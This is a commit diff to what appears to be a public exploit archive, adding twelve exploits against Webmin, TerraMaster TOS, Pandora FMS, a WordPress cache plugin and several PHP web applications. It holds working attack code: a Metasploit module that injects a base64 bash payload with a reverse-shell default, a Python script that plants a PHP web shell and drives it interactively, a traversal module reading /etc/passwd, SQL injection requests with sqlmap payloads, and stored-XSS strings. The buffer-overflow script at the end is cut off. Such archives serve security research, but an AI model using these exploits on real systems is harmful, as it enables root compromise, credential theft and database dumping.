DB: 2020-12-23
12 changes to exploits/shellcodes 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) Victor CMS 1.0 - File Upload To RCE Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) CSE Bookstore 1.0 - Multiple SQL Injection Library Management System 3.0 - _Add Category_ Stored XSS Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit) Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit) Artworks Gallery Management System 1.0 - 'id' SQL Injection Faculty Evaluation System 1.0 - Stored XSS TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
This commit is contained in:
parent
cd30696d15
commit
3aeb1a0d81
13 changed files with 739 additions and 0 deletions
165
exploits/linux/webapps/49318.rb
Executable file
165
exploits/linux/webapps/49318.rb
Executable file
|
@ -0,0 +1,165 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
|
||||
'Description' => %q(
|
||||
This module exploits an arbitrary command execution vulnerability in Webmin
|
||||
1.962 and lower versions. Any user authorized to the "Package Updates"
|
||||
module can execute arbitrary commands with root privileges.
|
||||
It emerged by circumventing the measure taken for CVE-2019-12840.
|
||||
s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
|
||||
Therefore, since the package name variable is placed directly in the system command,
|
||||
we can manipulate it using some escape characters that HTTP supports.
|
||||
For example, we can escape control by dropping the command line down one line.
|
||||
We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly,
|
||||
we must add double an ampersand(&&) to the end of the payload (%26%26)
|
||||
),
|
||||
'Author' => [
|
||||
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', 'CVE-2020-35606'],
|
||||
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 512,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd'
|
||||
}
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 10000,
|
||||
'SSL' => false,
|
||||
'PAYLOAD' => 'cmd/unix/reverse_perl'
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [['Webmin <= 1.962', {}]],
|
||||
'DisclosureDate' => '2020-12-21',
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
register_options [
|
||||
OptString.new('USERNAME', [true, 'Webmin Username']),
|
||||
OptString.new('PASSWORD', [true, 'Webmin Password']),
|
||||
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
|
||||
]
|
||||
end
|
||||
|
||||
def peer
|
||||
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
def login
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
|
||||
'cookie' => 'testing=1', # it must be used for "Error - No cookies"
|
||||
'vars_post' => {
|
||||
'page' => '',
|
||||
'user' => datastore['USERNAME'],
|
||||
'pass' => datastore['PASSWORD']
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
|
||||
return $1
|
||||
end
|
||||
|
||||
return nil unless res
|
||||
''
|
||||
end
|
||||
|
||||
def check
|
||||
cookie = login
|
||||
return CheckCode::Detected if cookie == ''
|
||||
return CheckCode::Unknown if cookie.nil?
|
||||
|
||||
vprint_status('Attempting to execute...')
|
||||
# check version
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
|
||||
'cookie' => "sid=#{cookie}",
|
||||
'vars_get' => { "xnavigation" => "1" }
|
||||
})
|
||||
|
||||
if res && res.code == 302 && res.body
|
||||
version = res.body.split("Webmin 1.")[1]
|
||||
return CheckCode::Detected if version.nil?
|
||||
version = version.split(" ")[0]
|
||||
if version <= "962"
|
||||
# check package update priv
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, "package-updates/"),
|
||||
'cookie' => "sid=#{cookie}"
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Software Package Update/
|
||||
print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
|
||||
return CheckCode::Vulnerable
|
||||
end
|
||||
end
|
||||
end
|
||||
print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
|
||||
print_status("Please try with another user account!")
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
cookie = login
|
||||
if cookie == '' || cookie.nil?
|
||||
fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
|
||||
end
|
||||
print_good("Session cookie: #{cookie}")
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
|
||||
'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
|
||||
'cookie' => "sid=#{cookie}"
|
||||
)
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::Unknown, 'Request failed')
|
||||
end
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
run_update(cookie)
|
||||
end
|
||||
|
||||
def run_update(cookie)
|
||||
@b64p = Rex::Text.encode_base64(payload.encoded)
|
||||
perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
|
||||
payload = Rex::Text.uri_encode(perl_payload)
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'cookie' => "sid=#{cookie}",
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
|
||||
'headers' =>
|
||||
{
|
||||
'Referer' => "#{peer}/package-updates/?xnavigation=1"
|
||||
},
|
||||
# new vector // bypass to backslash %0A%7C{}%26%26
|
||||
'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
|
||||
# for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
|
||||
})
|
||||
end
|
||||
end
|
66
exploits/linux/webapps/49321.py
Executable file
66
exploits/linux/webapps/49321.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
|
||||
# Date: 12/12/2020
|
||||
# Exploit Author: IHTeam
|
||||
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
|
||||
# Vendor Homepage: https://www.terra-master.com/
|
||||
# Version: <= 4.2.06
|
||||
# Tested on: 4.1.30, 4.2.06
|
||||
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import requests
|
||||
import time
|
||||
import sys
|
||||
import urllib.parse
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
|
||||
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
|
||||
args = parser.parse_args()
|
||||
|
||||
url = args.url
|
||||
headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
|
||||
epoch_time = int(time.time())
|
||||
shell_filename = "debug"+str(epoch_time)+".php"
|
||||
|
||||
def check_endpoint(url, headers):
|
||||
response = requests.get(url+'/version', headers=headers, verify=False)
|
||||
if response.status_code == 200:
|
||||
print("[+] TerraMaster TOS version: ", str(response.content))
|
||||
else:
|
||||
print("\n[-] TerraMaster TOS response code: ", response.status_code)
|
||||
sys.exit()
|
||||
|
||||
def upload_shell(url, headers, shell_filename):
|
||||
payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
|
||||
payload = urllib.parse.quote(payload, safe='')
|
||||
print("[/] Uploading shell...")
|
||||
response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
|
||||
time.sleep(1)
|
||||
response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
|
||||
if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
|
||||
print("[+] Upload succeeded")
|
||||
else:
|
||||
print("\n[-] Error uploading shell: ", response.content)
|
||||
sys.exit()
|
||||
|
||||
def interactive_shell(url, headers, shell_filename, cmd):
|
||||
response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
|
||||
print(str(response.text)+"\n")
|
||||
|
||||
|
||||
def delete_shell(url, headers, shell_filename):
|
||||
delcmd = "rm /usr/www/"+shell_filename
|
||||
response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
|
||||
print("\n[+] Shell deleted")
|
||||
|
||||
check_endpoint(url, headers)
|
||||
upload_shell(url, headers, shell_filename)
|
||||
try:
|
||||
while True:
|
||||
cmd = input("# ")
|
||||
interactive_shell(url, headers, shell_filename, cmd)
|
||||
except:
|
||||
delete_shell(url, headers, shell_filename)
|
|
@ -4,6 +4,7 @@
|
|||
# Vendor: Phpgurukul
|
||||
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
|
||||
# Version: 1.0
|
||||
# CVE: CVE-2020-35151
|
||||
|
||||
I DESCRIPTION
|
||||
========================================================================
|
||||
|
|
19
exploits/php/webapps/49310.txt
Normal file
19
exploits/php/webapps/49310.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Victor CMS 1.0 - File Upload To RCE
|
||||
# Date: 20.12.2020
|
||||
# Exploit Author: Mosaaed
|
||||
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
|
||||
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
||||
# Version: 1.0
|
||||
|
||||
# Tested on: Apache2/Linux
|
||||
|
||||
Step1: register http://localhost/CMSsite-master/register.php
|
||||
step2: login as user
|
||||
step3: Go to Profile
|
||||
step4: upload imag as php file (upload shell.php)
|
||||
step5: update user
|
||||
step6: You will find your shell in img folder :/path/img/cmd.php
|
||||
|
||||
http://localhost/CMSsite-master/img/cmd.php?cmd=id
|
||||
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
82
exploits/php/webapps/49312.txt
Normal file
82
exploits/php/webapps/49312.txt
Normal file
|
@ -0,0 +1,82 @@
|
|||
# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
|
||||
# Date: 12-21-2020
|
||||
# Exploit Author: Matthew Aberegg, Alex Prieto
|
||||
# Vendor Homepage: https://pandorafms.com/
|
||||
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
|
||||
# Software Link: https://pandorafms.com/community/get-started/
|
||||
# Version: Pandora FMS 7.0 NG 750
|
||||
# Tested on: Ubuntu 18.04
|
||||
|
||||
|
||||
# Vulnerability Details
|
||||
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
|
||||
# Vulnerable Parameter : network_csv
|
||||
|
||||
|
||||
# POC
|
||||
|
||||
POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
|
||||
Content-Length: 1597
|
||||
Origin: http://TARGET
|
||||
Connection: close
|
||||
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
|
||||
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="interval_manual_defined"
|
||||
|
||||
1
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="interval_select"
|
||||
|
||||
300
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="interval_text"
|
||||
|
||||
0
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="interval"
|
||||
|
||||
0
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="interval_units"
|
||||
|
||||
1
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="taskname"
|
||||
|
||||
test
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="id_recon_server"
|
||||
|
||||
3
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="network_csv_enabled"
|
||||
|
||||
on
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
|
||||
Content-Type: text/plain
|
||||
|
||||
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
|
||||
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="network"
|
||||
|
||||
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="comment"
|
||||
|
||||
test
|
||||
-----------------------------308827614039434535382911921119
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
Next
|
||||
-----------------------------308827614039434535382911921119--
|
110
exploits/php/webapps/49314.txt
Normal file
110
exploits/php/webapps/49314.txt
Normal file
|
@ -0,0 +1,110 @@
|
|||
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
|
||||
# Date : 2020-12-21
|
||||
# Author : Musyoka Ian
|
||||
# Version : CSE Bookstore 1.0
|
||||
# Vendor Homepage: https://projectworlds.in/
|
||||
# Platform : PHP
|
||||
# Tested on : Debian
|
||||
|
||||
CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
|
||||
|
||||
Below is results returned by SQLMap
|
||||
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
|
||||
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
|
||||
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
|
||||
|
||||
Type: time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
|
||||
|
||||
|
||||
POC 1
|
||||
|
||||
REQUEST
|
||||
========
|
||||
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
|
||||
Host: 192.168.196.83
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
RESPONSE
|
||||
========
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 21 Dec 2020 20:09:49 GMT
|
||||
Server: Apache/2.4.38 (Debian)
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate
|
||||
Pragma: no-cache
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 172
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
|
||||
|
||||
POC 2
|
||||
Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
|
||||
|
||||
REQUEST
|
||||
=======
|
||||
|
||||
POST /ebook/cart.php HTTP/1.1
|
||||
Host: 192.168.196.83
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 57
|
||||
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
|
||||
|
||||
|
||||
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
|
||||
|
||||
RESPONSE
|
||||
=======
|
||||
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
|
||||
|
||||
POC 3.
|
||||
Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
|
||||
|
||||
REQUEST
|
||||
=======
|
||||
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
|
||||
Host: 192.168.196.83
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Referer: http://192.168.196.83/ebook/books.php
|
||||
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
|
||||
|
||||
RESPONSE
|
||||
========
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 21 Dec 2020 20:47:58 GMT
|
||||
Server: Apache/2.4.38 (Debian)
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate
|
||||
Pragma: no-cache
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 188
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
|
20
exploits/php/webapps/49315.txt
Normal file
20
exploits/php/webapps/49315.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
|
||||
# Exploit Author: Kislay Kumar
|
||||
# Date: 2020-12-22
|
||||
# Google Dork: N/A
|
||||
# Vendor Homepage: https://otsglobal.org/
|
||||
# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
|
||||
# Affected Version: 3.0
|
||||
# Patched Version: Unpatched
|
||||
# Category: Web Application
|
||||
# Tested on: Kali Linux
|
||||
|
||||
Step 1. Login as Admin.
|
||||
|
||||
Step 2. Select "Book" from menu and select "Categories" from sub menu and
|
||||
after that click on "Add Category".
|
||||
|
||||
Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name"
|
||||
|
||||
Step 4. Now Click on "Save" , Go to "Category" and See last , there you
|
||||
will get alert box.
|
18
exploits/php/webapps/49316.txt
Normal file
18
exploits/php/webapps/49316.txt
Normal file
|
@ -0,0 +1,18 @@
|
|||
# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
|
||||
# Exploit Author: Kislay Kumar
|
||||
# Date: 2020-12-21
|
||||
# Google Dork: N/A
|
||||
# Vendor Homepage: https://www.ramomcoder.com/
|
||||
# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
|
||||
# Affected Version: 3.5
|
||||
# Category: Web Application
|
||||
# Tested on: Kali Linux
|
||||
|
||||
Step 1. Login as Super Admin.
|
||||
|
||||
Step 2. Select "Branch" from menu and after that click on "Create Branch".
|
||||
|
||||
Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name" ,
|
||||
"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State".
|
||||
|
||||
Step 4. Now Click on "Save" and you will get a list of alert boxes.
|
86
exploits/php/webapps/49317.rb
Executable file
86
exploits/php/webapps/49317.rb
Executable file
|
@ -0,0 +1,86 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
#
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HTTP::Wordpress
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated directory traversal vulnerability
|
||||
in WordPress plugin
|
||||
'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
|
||||
the web server privileges.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2019-6715'],
|
||||
['WPVDB', '9248'],
|
||||
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
|
||||
['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'VinhJAXT', # Vulnerability discovery
|
||||
'Hoa Nguyen - SunCSR Team' # Metasploit module
|
||||
],
|
||||
'DisclosureDate' => '2014-09-20',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
|
||||
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
traversal = '../' * datastore['DEPTH']
|
||||
filename = datastore['FILEPATH']
|
||||
filename = filename[1, filename.length] if filename =~ %r{^/}
|
||||
|
||||
json_body = { 'Type' => "SubscriptionConfirmation",
|
||||
'Message' => '',
|
||||
'SubscribeURL' => "file:///#{traversal}#{filename}"
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'PUT',
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
|
||||
'ctype' => 'application/json',
|
||||
'data' => JSON.generate(json_body)
|
||||
})
|
||||
|
||||
fail_with Failure::Unreachable, 'Connection failed' unless res
|
||||
fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
|
||||
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
|
||||
|
||||
print_status('Downloading file...')
|
||||
print_line("\n#{res.body}\n")
|
||||
|
||||
fname = datastore['FILEPATH']
|
||||
path = store_loot(
|
||||
'w3_total_cache.traversal',
|
||||
'text/plain',
|
||||
ip,
|
||||
res.body,
|
||||
fname
|
||||
)
|
||||
print_good("File saved in: #{path}")
|
||||
end
|
||||
end
|
64
exploits/php/webapps/49319.txt
Normal file
64
exploits/php/webapps/49319.txt
Normal file
|
@ -0,0 +1,64 @@
|
|||
# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
|
||||
# Exploit Author: Vijay Sachdeva
|
||||
# Date: 2020-12-22
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
|
||||
# Affected Version: Version 1
|
||||
# Tested on Kali Linux
|
||||
|
||||
Step 1. Log in to the application with admin credentials.
|
||||
|
||||
Step 2. Click on "Explore" and then select "Artworks".
|
||||
|
||||
Step 3. Choose any item, the URL should be "
|
||||
|
||||
http://localhost/art-bay/info_art.php?id=6
|
||||
|
||||
Step 4. Run sqlmap on the URL where the "id" parameter is given
|
||||
|
||||
|
||||
sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
|
||||
|
||||
---
|
||||
|
||||
|
||||
Parameter: id (GET)
|
||||
|
||||
Type: boolean-based blind
|
||||
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
|
||||
Payload: id=8 AND 4531=4531
|
||||
|
||||
|
||||
Type: time-based blind
|
||||
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
|
||||
Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
|
||||
|
||||
|
||||
Type: UNION query
|
||||
|
||||
Title: Generic UNION query (NULL) - 9 columns
|
||||
|
||||
Payload: id=8 UNION ALL SELECT
|
||||
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
|
||||
-
|
||||
|
||||
---
|
||||
|
||||
[08:18:34] [INFO] the back-end DBMS is MySQL
|
||||
|
||||
[08:18:34] [INFO] fetching banner
|
||||
|
||||
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
|
||||
|
||||
banner: '10.3.24-MariaDB-2'
|
||||
|
||||
|
||||
---
|
||||
|
||||
|
||||
Step 5. Sqlmap should inject the web-app successfully which leads to
|
||||
information disclosure.
|
19
exploits/php/webapps/49320.txt
Normal file
19
exploits/php/webapps/49320.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
|
||||
# Exploit Author: Vijay Sachdeva (pwnshell)
|
||||
# Date: 2020-12-22
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
|
||||
# Tested on Kali Linux
|
||||
|
||||
Step 1: Log in to the application with admin credentials
|
||||
|
||||
Step 2: Click on Questionnaires, then click "Action" for any Academic Year
|
||||
and then click manage.
|
||||
|
||||
Step 3. Input "<script>alert("pwnshell")</script>" in "Question" field of
|
||||
the Question form.
|
||||
|
||||
Step 4. Click on "Save" when done and this will trigger the Stored XSS
|
||||
payloads. Whenever you click on Questionnaires, click action for any
|
||||
academic year, and then manage, your XSS Payloads will be triggered for
|
||||
that "Academic Year"
|
78
exploits/windows/local/49322.py
Executable file
78
exploits/windows/local/49322.py
Executable file
|
@ -0,0 +1,78 @@
|
|||
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
|
||||
# Date: 2020-12-22
|
||||
# Exploit Author: Florian Gassner
|
||||
# Vendor Homepage: https://www.10-strike.com/
|
||||
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
|
||||
# Version: 9.05
|
||||
# Tested on: Windows 10 x64
|
||||
|
||||
# Computer -> From Text File -> Choose exploit.txt
|
||||
|
||||
import struct
|
||||
|
||||
"""
|
||||
Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
|
||||
"""
|
||||
|
||||
OFFSET = 214
|
||||
|
||||
"""
|
||||
badchars = '\x00\x09\x0a\x0d\x3a\x5c'
|
||||
"""
|
||||
|
||||
"""
|
||||
Log data, item 23
|
||||
Address=01015AF4
|
||||
